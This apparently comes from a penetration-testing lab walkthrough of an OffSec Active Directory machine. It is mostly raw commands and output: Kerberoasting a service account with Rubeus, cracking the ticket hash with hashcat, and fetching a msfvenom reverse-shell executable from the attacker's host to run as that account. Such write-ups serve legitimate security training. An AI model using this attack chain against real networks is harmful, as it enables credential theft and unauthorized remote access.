svc_mssql

PS C:\programdata> curl 192.168.45.169/Rubeus.exe -o Rubeus.exe

PS C:\programdata> .\Rubeus.exe kerberoast /outfile:hashes.kerberoast
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0 


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain          : access.offsec
[*] Searching path 'LDAP://SERVER.access.offsec/DC=access,DC=offsec' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 1


[*] SamAccountName         : svc_mssql
[*] DistinguishedName      : CN=MSSQL,CN=Users,DC=access,DC=offsec
[*] ServicePrincipalName   : MSSQLSvc/DC.access.offsec
[*] PwdLastSet             : 5/21/2022 5:33:45 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\programdata\hashes.kerberoast

[*] Roasted hashes written to : C:\programdata\hashes.kerberoast

PS C:\programdata> type C:\programdata\hashes.kerberoast
type C:\programdata\hashes.kerberoast
$krb5tgs$23$*svc_mssql$access.offsec$MSSQLSvc/DC.access.offsec@access.offsec*$6B9F9783A7655D841C4EC6EC5C800AE5$CD94050386E8A9D212228732D06E67E0F8EFD67C89F80F78D9F2CD967E2411A0D7CB03E875DB33B1F85254B783E519AB83F93E4B66B2603AB65B13C199BA5F39B3AE1F6B6B9BE8C719232626F6400BB486FA4F314AAEAFB9043D527E8A7C30D10548953E92201D4995FAC2FB31B88CBF69764742681B348CB4464C96ADDC2FEE677E82532ACBAE9C6A81EE0CA8622DF3E6660683862165F78F80D332C45888A78F3105E80615C6BE5579EE84CD8E8C9C5ADBF313F6045635769D9A69A2745A6D87F278EBC7E82856CACF241F86CA69F72EE08D54BCD060EB9249B563960BF4055274181F676231D80DBD9C749CE89C27CF8B4C60812FF2B17D0C30932895E92985AED780A32F5F399011758BBF9A51C4D8A86D8464F4BF42E2BC8C054AA127C86258C96477592D56275BD4FE5593C945DF7AEFD70349D7B1B7F6E5222D8D19F1FBE22BA27341EA224DBEF9640108B76B7157B8AB900CB096309CA82B3F07CE32D38B216459549D42ABF887386C31BF9E73EEBCDA92F7C1EDC2A57D6396706CE4099A7058348FAAA1A39B5463A1461F8D34CF1DEBDBA46FE60A26C0DB0E6002973DB7D7CF1E7CA160420E3DDB7B8EDB398A27B4480175C8A7148436E73E2D441BAC43CC048471352F11F2606CF955A02329DAE011C509D095D3144C70D4219BFB33CCAF5273DC50738C1B5D6AB0EA382C32CD0F7BCA0792EE250DD6C4303712CB28ED857FE68237E8A110EAB884257C8F7CBD6E5DF4C10905B2E38A817C5963FDF230E08ED3B3AB91F4715FCE408B4CA80072FF84AD07BD9F700AD9C10FD17E0114FAD1CA2046E3F295338A3F9CB11EF5944712025B7DBF78954D99CB4A7703EF8DC743A2E3A7901A6B9309DC7A1D276C680F7074047ECE5D8312963908D182AE32D9E8544913075E5A9A8AE073642835311FD690B8DC8C196DEE0F4F47867646A0F9AB4B888E4E27558E6076AE142DE551200CE6DDFC3D55539B37F601E6B33AED7CC6CDBFCC5E59DC6144D371543391AD505B3A441B9F43ECF60A4B76DAD45CE2D2FC2EDB4AE6AF96866569C6902BF1AA5C1C89544F2DECF06A19E85C12854FAECA7B36383DA2CF566D27A6CF6956E68D15C19597EB4FBFE46BF02F76D6C21454C22F05101D066CEB29778050B35E484B0E571D22256CEE0DA6ECE713EF6596574FC25D9F7C6C03E0429A51BB8BD02FFD3496FEFAB6656F9E0F76AECCD7043237A22A4135E50DCCB380BF14B58FCC587392BD030C66A8EAC176C5EF0B3ABF84B8841C99073993C44FD5237B900B7355032C5B40E1F2BD0AEEDDEDB2E3705BADEA27FC54325AE9CABB82E03FBB0F9449D57C7CC50F5A7D7E3450783DEE656DDD60D6A9E4A2B6B6051EA00166ED6E3F921D0C417481F8495D1EDCF5BC104CC389713D895A2C942F8EEF2FDD53134CFD9A8240B776CA6DCF038A6051A4FD9DD1A15327BEFA1287BB85F15A71AC1C6BE84B4F1559A55E86AA796993DE9BAF7F06088B989122FE20A4C0089937AE01815BBA590C2E7501FD66A5E807D7FE8880284594153C1EA94664C9AE00F4D3FA229EFD8969F29D30E60EAE44B5070654E04E7DD7F8036AEA62CAC17C7734054564676693C0

$ vi svc_sql.hash

$ hashcat -m 13100 svc_sql.hash ~/rockyou.txt -O

svc_sql:trustno1

$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.169 LPORT=1338 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes

$ python -m http.server 80 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

$ nc -lnvp 1338              
listening on [any] 1338 ...

PS C:\programdata> curl 192.168.45.169/shell.exe -o shell.exe

PS C:\programdata> curl 192.168.45.233/Invoke-RunasCs.ps1 -o Invoke-RunasCs.ps1

PS C:\programdata> Import-Module .\Invoke-RunasCs.ps1

$ nc -lnvp 1338
listening on [any] 1338 ...

Invoke-RunasCs svc_mssql trustno1 'C:\programdata\shell.exe'

$ nc -lnvp 1338
listening on [any] 1338 ...
connect to [192.168.45.233] from (UNKNOWN) [192.168.170.187] 49862
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
access\svc_mssql

C:\Windows\system32>type C:\Users\svc_mssql\Desktop\local.txt
type C:\Users\svc_mssql\Desktop\local.txt
f028fdace958435f09b790598d428dba

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.170.187
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.170.254

PreviousPriv Esc NextAdministrator

Last updated 6 months ago